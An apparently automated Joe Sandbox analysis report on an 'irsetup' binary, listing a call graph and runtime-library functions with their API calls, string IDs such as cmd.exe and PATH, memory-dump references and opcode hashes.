25178->25180 25179->25147 25181 18000cc04 25180->25181 25182 18000cad5 25180->25182 25192 18000c850 91 API calls 25181->25192 25184 18000cada 25182->25184 25188 18000cb40 25182->25188 25186 18000caeb 25184->25186 25190 18000c4b0 91 API calls 25184->25190 25185 18000ccf9 25185->25147 25186->25147 25188->25186 25191 18000c420 91 API calls 25188->25191 25190->25186 25191->25186 25192->25185 25196 18001c890 25193->25196 25194 18001c91b 25194->25112 25196->25194 25199 18001b980 25196->25199 25197->25101 25200 18001b9ac 25199->25200 25203 18001b9c5 25199->25203 25202 18000a020 91 API calls 25200->25202 25200->25203 25201 18001ba31 25201->25196 25202->25203 25203->25201 25205 18000a020 25203->25205 25209 18000a051 25205->25209 25210 18000a100 25205->25210 25207 18000a13f 25207->25201 25208 18000a0df 25208->25210 25209->25208 25209->25210 25212 180009ec0 91 API calls 25209->25212 25213 18001e0d0 8 API calls _wfreopen 25210->25213 25213->25207 25214 180002220 25215 180002238 25214->25215 25216 18000ac70 105 API calls 25215->25216 25217 180002280 25216->25217 25218 1800019a0 25219 1800019cb 25218->25219 25220 1800019d0 25218->25220 25221 18000cd10 91 API calls 25219->25221 25222 180016b10 91 API calls 25220->25222 25221->25220 25223 1800019e2 25222->25223 25224 180003b60 25225 180003b9b 25224->25225 25232 180003c41 25224->25232 25245 180002b80 91 API calls __wtomb_environ 25225->25245 25226 180003caa 25228 180003bd3 25246 180001c70 91 API calls 25228->25246 25232->25226 25239 180001b00 25232->25239 25250 180001ee0 91 API calls 25232->25250 25233 180003be1 25233->25232 25247 180002b80 91 API calls __wtomb_environ 25233->25247 25235 180003c0f 25236 180003c26 25235->25236 25248 180002960 91 API calls 25235->25248 25249 180001ee0 91 API calls 25236->25249 25240 180001b26 25239->25240 25241 180001b2b 25239->25241 25242 18000cd10 91 API calls 25240->25242 25251 18000b470 25241->25251 25242->25241 25244 180001b50 25244->25232 25245->25228 25246->25233 25247->25235 25248->25236 25249->25232 25250->25232 25252 1800108a0 91 API calls 25251->25252 25253 18000b4a1 25252->25253 25253->25244

                                                                                                                    Executed Functions

                                                                                                                    Function 0000000180029E74 Relevance: 10.6, APIs: 7, Instructions: 87threadCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 000000018002D374: HeapCreate.KERNEL32(?,?,?,?,0000000180029E89), ref: 000000018002D386
                                                                                                                      • Part of subcall function 000000018002D374: HeapSetInformation.KERNEL32 ref: 000000018002D3B0
                                                                                                                    • _RTC_Initialize.LIBCMT ref: 0000000180029EA4
                                                                                                                    • GetCommandLineA.KERNEL32 ref: 0000000180029EA9
                                                                                                                      • Part of subcall function 0000000180038D00: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038D2F
                                                                                                                      • Part of subcall function 0000000180038D00: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038D6F
                                                                                                                      • Part of subcall function 000000018002C830: GetStartupInfoA.KERNEL32 ref: 000000018002C855
                                                                                                                    • __setargv.LIBCMT ref: 0000000180029ED2
                                                                                                                    • _cinit.LIBCMT ref: 0000000180029EE6
                                                                                                                      • Part of subcall function 000000018002C178: FlsFree.KERNEL32(?,?,?,?,0000000180029F37), ref: 000000018002C187
                                                                                                                      • Part of subcall function 000000018002C178: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000180029F37), ref: 000000018002D1A6
                                                                                                                      • Part of subcall function 000000018002C178: free.LIBCMT ref: 000000018002D1AF
                                                                                                                      • Part of subcall function 000000018002C178: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000180029F37), ref: 000000018002D1CF
                                                                                                                      • Part of subcall function 000000018002BFC8: Sleep.KERNEL32(?,?,?,000000018002C287,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C00D
                                                                                                                    • FlsSetValue.KERNEL32 ref: 0000000180029F6C
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0000000180029F80
                                                                                                                    • free.LIBCMT ref: 0000000180029F8F
                                                                                                                      • Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
                                                                                                                      • Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
                                                                                                                      • Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heapfree$CriticalDeleteEnvironmentFreeSectionStrings$CommandCreateCurrentErrorInfoInformationInitializeLastLineSleepStartupThreadValue__setargv_cinit_errno
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1549890855-0
                                                                                                                    • Opcode ID: a0acf61c1b87e16a772799abe4b62362619cbdfa8acdc2e6844dc3a99a0f0c98
                                                                                                                    • Instruction ID: 5d89b5062d79ddf7cbf42b6751900f03d5044372f9c69ff6a2a4972f2435356c
                                                                                                                    • Opcode Fuzzy Hash: a0acf61c1b87e16a772799abe4b62362619cbdfa8acdc2e6844dc3a99a0f0c98
                                                                                                                    • Instruction Fuzzy Hash: CC315A3060260D85FEE7B7F096423FE13946F5D3D4F22C525B916852E7EE258B8C8322
                                                                                                                    Function 000000018002E8A4 Relevance: 9.1, APIs: 6, Instructions: 122COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • _getptd.LIBCMT ref: 000000018002E8C3
                                                                                                                      • Part of subcall function 000000018002E59C: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,000000018002E8DE,?,?,?,?,?,000000018002EAB3), ref: 000000018002E5C6
                                                                                                                      • Part of subcall function 000000018002BF5C: malloc.LIBCMT ref: 000000018002BF7B
                                                                                                                      • Part of subcall function 000000018002BF5C: Sleep.KERNEL32(?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5,?,?,00000000,000000018002C2AC), ref: 000000018002BF92
                                                                                                                    • free.LIBCMT ref: 000000018002E94F
                                                                                                                      • Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
                                                                                                                      • Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
                                                                                                                      • Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334
                                                                                                                    • _lock.LIBCMT ref: 000000018002E987
                                                                                                                    • free.LIBCMT ref: 000000018002EA37
                                                                                                                    • free.LIBCMT ref: 000000018002EA67
                                                                                                                    • _errno.LIBCMT ref: 000000018002EA6C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free$_errno_getptd$ErrorFreeHeapLastSleep_lockmalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2878544890-0
                                                                                                                    • Opcode ID: e82f143c23f227001045ea17cfd9d9e54a22bd3adced516c1c47190338206767
                                                                                                                    • Instruction ID: c776ccf790241ac67246d89d90e9fa713756aa25b18aceaf8fd82d01af155c51
                                                                                                                    • Opcode Fuzzy Hash: e82f143c23f227001045ea17cfd9d9e54a22bd3adced516c1c47190338206767
                                                                                                                    • Instruction Fuzzy Hash: CB51B231600A8886E7E39B65A4403E9B7A1F78ABD8F14C216FA5E473A5CF78D649C701
                                                                                                                    Function 000000018002D374 Relevance: 3.0, APIs: 2, Instructions: 18memoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 149 18002d374-18002d396 HeapCreate 150 18002d398-18002d3b6 HeapSetInformation 149->150 151 18002d3bb-18002d3bf 149->151 150->151
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$CreateInformation
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1774340351-0
                                                                                                                    • Opcode ID: 39044132f5a22a3317da2d95eb259efacad0cdd120c364843a2d6d13d7c05708
                                                                                                                    • Instruction ID: d86c038a14694898d099bceb00610aad7d4d496ac8821e0f5eb4db07846aa6a7
                                                                                                                    • Opcode Fuzzy Hash: 39044132f5a22a3317da2d95eb259efacad0cdd120c364843a2d6d13d7c05708
                                                                                                                    • Instruction Fuzzy Hash: 30E04F75621B84C2F7DAAB21E8457A66290F78C380F909029F94942B94DF7DC2498B00
                                                                                                                    Function 000000018002BF5C Relevance: 2.5, APIs: 2, Instructions: 30sleepCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 221 18002bf5c-18002bf75 222 18002bf78-18002bf7b call 18002d3e0 221->222 224 18002bf80-18002bf86 222->224 225 18002bf88-18002bf8e 224->225 226 18002bfb0-18002bfc7 224->226 225->226 227 18002bf90-18002bfae Sleep 225->227 227->222 227->226
                                                                                                                    APIs
                                                                                                                    • malloc.LIBCMT ref: 000000018002BF7B
                                                                                                                      • Part of subcall function 000000018002D3E0: _FF_MSGBANNER.LIBCMT ref: 000000018002D410
                                                                                                                      • Part of subcall function 000000018002D3E0: HeapAlloc.KERNEL32(?,?,00000000,000000018002BF80,?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5), ref: 000000018002D435
                                                                                                                      • Part of subcall function 000000018002D3E0: _errno.LIBCMT ref: 000000018002D459
                                                                                                                      • Part of subcall function 000000018002D3E0: _errno.LIBCMT ref: 000000018002D464
                                                                                                                    • Sleep.KERNEL32(?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5,?,?,00000000,000000018002C2AC), ref: 000000018002BF92
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$AllocHeapSleepmalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 496785850-0
                                                                                                                    • Opcode ID: c64cacc54551c1d413d26b4b77fca54a5991493b7637ea44cfe571c06a399083
                                                                                                                    • Instruction ID: ccdb5c5ed8c45f556dc77aec0225093e2b7ac281c4f631198e9e49a815c37d6e
                                                                                                                    • Opcode Fuzzy Hash: c64cacc54551c1d413d26b4b77fca54a5991493b7637ea44cfe571c06a399083
                                                                                                                    • Instruction Fuzzy Hash: 31F0FC32205A8C82E6D79F26E58036EB360F78CBD4F558124FA5D03795CF38CA958F00
                                                                                                                    Function 00000001800034F0 Relevance: 1.3, APIs: 1, Instructions: 13COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • free.LIBCMT ref: 00000001800034FF
                                                                                                                      • Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
                                                                                                                      • Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
                                                                                                                      • Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFreeHeapLast_errnofree
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3856698052-0
                                                                                                                    • Opcode ID: 2acc962203dc7ae12ea3bb038dd3365208552806d81bcc30d1bb0bb085e2326a
                                                                                                                    • Instruction ID: 24eefc2905acafd760541be8a1a1f06bbdc94ff17dd78c782732821f245c605b
                                                                                                                    • Opcode Fuzzy Hash: 2acc962203dc7ae12ea3bb038dd3365208552806d81bcc30d1bb0bb085e2326a
                                                                                                                    • Instruction Fuzzy Hash: 00C08C94F52F0E82DDAEE2A308D27F800C107AFBC0D80C420F80A8A380DC1CC3AB0B00

                                                                                                                    Non-executed Functions

                                                                                                                    Function 0000000180020C38 Relevance: 54.7, APIs: 26, Strings: 5, Instructions: 493COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$DecodePointer
                                                                                                                    • String ID: /c $COMSPEC$PATH$cmd.exe$w
                                                                                                                    • API String ID: 2310398763-3679458415
                                                                                                                    • Opcode ID: 500590a71f3528d87d2e0ac02872d3b0dafdd78488768c422d5b14c18cecb6bd
                                                                                                                    • Instruction ID: 9f0d6bfb52196638ce6bad66fd6574380d9c8f482639ba9c857dbbd3f1092ba9
                                                                                                                    • Opcode Fuzzy Hash: 500590a71f3528d87d2e0ac02872d3b0dafdd78488768c422d5b14c18cecb6bd
                                                                                                                    • Instruction Fuzzy Hash: 4522B23220478886FBB7DB65A4517EEB391F78D7C4F548125BA8987B96CF38C649CB00
                                                                                                                    Function 0000000180032638 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 468COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __doserrno_errno
                                                                                                                    • String ID: U
                                                                                                                    • API String ID: 921712934-4171548499
                                                                                                                    • Opcode ID: 48a7f9feffc5bfc5e053856909e6f80eec15adabe95c1eaed7459d9126117ee3
                                                                                                                    • Instruction ID: b99c78c3d65ca0191b994378c1241e68cd305618541e39d27e1f96f7d254ba1e
                                                                                                                    • Opcode Fuzzy Hash: 48a7f9feffc5bfc5e053856909e6f80eec15adabe95c1eaed7459d9126117ee3
                                                                                                                    • Instruction Fuzzy Hash: BF12B23221464986EBA38F25E4443EBB7A0F78C7C4F568116FA89477A5DF39C64DCB10
                                                                                                                    Function 0000000180037DC8 Relevance: 28.9, APIs: 19, Instructions: 377COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: String$free$ByteCharMultiWidemalloc$ErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1837315383-0
                                                                                                                    • Opcode ID: cacc80e21e0b7faa225b9fdaf443091b09f2c2604889e9d2f947d49bd1adc46f
                                                                                                                    • Instruction ID: a7cd305ef16002d982a5c2a4af8f81cce234251d115d984bdccc4e66b87c68b2
                                                                                                                    • Opcode Fuzzy Hash: cacc80e21e0b7faa225b9fdaf443091b09f2c2604889e9d2f947d49bd1adc46f
                                                                                                                    • Instruction Fuzzy Hash: D8F19F32200B888AE7A78F25D4407DA77A1FB4CBE8F568615FA5957BD4DF38CB498700
                                                                                                                    Function 00000001800352F8 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$free$DecodePointer
                                                                                                                    • String ID: PATH
                                                                                                                    • API String ID: 3098740396-1036084923
                                                                                                                    • Opcode ID: 7f8aa0d2bc419b7ac494ea42fc3385d60b1a286c2162d3fafcbbe687e9060918
                                                                                                                    • Instruction ID: 9a3c46973cae5f37c669a60ded91cf3780b69c90c913b2de57871a32441f2394
                                                                                                                    • Opcode Fuzzy Hash: 7f8aa0d2bc419b7ac494ea42fc3385d60b1a286c2162d3fafcbbe687e9060918
                                                                                                                    • Instruction Fuzzy Hash: 0C711631201A8841FBE3AA2195617FF2382AB8D7D9F45C522FE9A077D6DE38C74D8701
                                                                                                                    Function 000000018003029C Relevance: 18.2, APIs: 12, Instructions: 211COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __doserrno_errno$DecodePointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3911551546-0
                                                                                                                    • Opcode ID: 552b4b0fef55a77f0b16bb130acd12287ff159c4b9a0ed71046dbff09db99d99
                                                                                                                    • Instruction ID: 164ba2cb6b460aa59382b2c1d58f859bc5e2f64025dd1feaf38bdf79f172ba54
                                                                                                                    • Opcode Fuzzy Hash: 552b4b0fef55a77f0b16bb130acd12287ff159c4b9a0ed71046dbff09db99d99
                                                                                                                    • Instruction Fuzzy Hash: D591E232214A8882EB93DF65E4907EF7B61F3887D0F558116FA8907BA5CF78C548CB00
                                                                                                                    Function 000000018003A8E4 Relevance: 18.1, APIs: 12, Instructions: 115memoryfileCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$Heap$ErrorFileLastProcess__doserrno$AllocFreePointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3112900366-0
                                                                                                                    • Opcode ID: 1acf10fccda49597a569ff7a61e3d259f8e1ce3ac393ce0a89e29cdfbef2b00e
                                                                                                                    • Instruction ID: 8eb280900b96f9cb44dac23b3b5a6d05d6d782666a4f137379f29f380706e389
                                                                                                                    • Opcode Fuzzy Hash: 1acf10fccda49597a569ff7a61e3d259f8e1ce3ac393ce0a89e29cdfbef2b00e
                                                                                                                    • Instruction Fuzzy Hash: 2E419F3530495846FAA7AB759D043EE7391A74EBF0F06C712BA79077D2DE38864A8701
                                                                                                                    Function 000000018003CD74 Relevance: 17.9, APIs: 8, Strings: 2, Instructions: 354COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free$_errno$ExceptionFilterProcessUnhandled__doserrno$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual_lock
                                                                                                                    • String ID: SystemRoot$cmd.exe
                                                                                                                    • API String ID: 2783816385-1915010242
                                                                                                                    • Opcode ID: f435228b7c99033ebf9bbf731d6440864f99d1bda75eeee7b1c28e628a164daa
                                                                                                                    • Instruction ID: 7d2aedf081fda9467836d831cf405406e94ff08d2ab400320d1a2de9d3ad4fb8
                                                                                                                    • Opcode Fuzzy Hash: f435228b7c99033ebf9bbf731d6440864f99d1bda75eeee7b1c28e628a164daa
                                                                                                                    • Instruction Fuzzy Hash: 44E1D03220568886EBA3DF25E5507EF6791F78DBC4F06C122FA4A97B95CF38C6498701
                                                                                                                    Function 000000018003779C Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 161COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Locale$InfoValid$CodeDefaultPageUser_getptd_itow_s
                                                                                                                    • String ID: Norwegian-Nynorsk
                                                                                                                    • API String ID: 2273835618-461349085
                                                                                                                    • Opcode ID: cd1b9dbfe264d746d2e8f6b4703a042a5d78dbd1592c6507181496ebb6678025
                                                                                                                    • Instruction ID: 761428af2cddcf0ece5004559499aa7377a8e36176df394555f2b51de48901ed
                                                                                                                    • Opcode Fuzzy Hash: cd1b9dbfe264d746d2e8f6b4703a042a5d78dbd1592c6507181496ebb6678025
                                                                                                                    • Instruction Fuzzy Hash: 75616F7630078886FBB78F21D4453EA23A0E748BC8F1AC526EA4D467D6DF78CA49C351
                                                                                                                    Function 000000018002759C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
